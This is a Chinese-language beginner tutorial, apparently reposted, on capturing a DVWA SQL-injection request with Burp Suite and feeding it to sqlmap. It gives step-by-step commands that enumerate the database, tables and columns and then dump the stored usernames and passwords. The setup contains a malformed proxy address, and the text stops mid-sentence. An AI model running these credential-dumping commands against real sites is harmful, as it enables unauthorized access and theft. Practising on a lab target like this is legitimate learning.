使用burpsuite抓包 + sql工具注入 dvwa初级靶场 |
您所在的位置:网站首页 › buuctf web dvwa › 使用burpsuite抓包 + sql工具注入 dvwa初级靶场 |
使用burpsuite抓包 + sql工具注入 dvwa靶场
记录一下自己重新开始学习web安全之路②。 一、准备工作 1.工具准备 sqlmap + burpsuite 2.浏览器准备 火狐浏览器 + 设置代理。首先,先设置一下火狐浏览器的代理 http代理地址为127.0.0.0.1 ,端口为8080 3.burpsuite 准备 将burpsuite的抓包功能打开。注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要用本地网卡 ip/dvwa-master 访问 怎么查到本地网卡ip?在cmd中输入ipconfig 得到本地网卡ip 192.168.92.1 如果是无线网,那么找无线网适配器的IPV4地址 通过本地网卡ip进入dvwa,把安全等级改为low等级,,设置代理之后。 在搜索框输入之后,点击submit。 通过burpsuite抓包得到 如: (GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1)即有?id=1,2等 然后在burpsuite中 点击Action — Save item 保存到本地。 保存之后,利用sqlmap工具。首先要在cmd中先来到sqlmap的文件路径下。 目标:拿账号密码(数据) 1.查询数据库的名称 (dvwa)python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db -r // 指定读取本地文件 –current-db //列出当前网站数据库名称 2.查询数据表的名称 (guestbook 、users)python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables -D //指定数据库名称 –tables //数据表 3.查询数据列的名称 (user 、password)python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns -T //指定数据表的名称 –columns //列出数据列的名称 4.读取数据 (user、password)python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump -C //指定数据列的名称 –dump // 读取数据 拿账号密码时遇到的问题: 1.首先是burpsuite抓包时 火狐浏览器显示 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |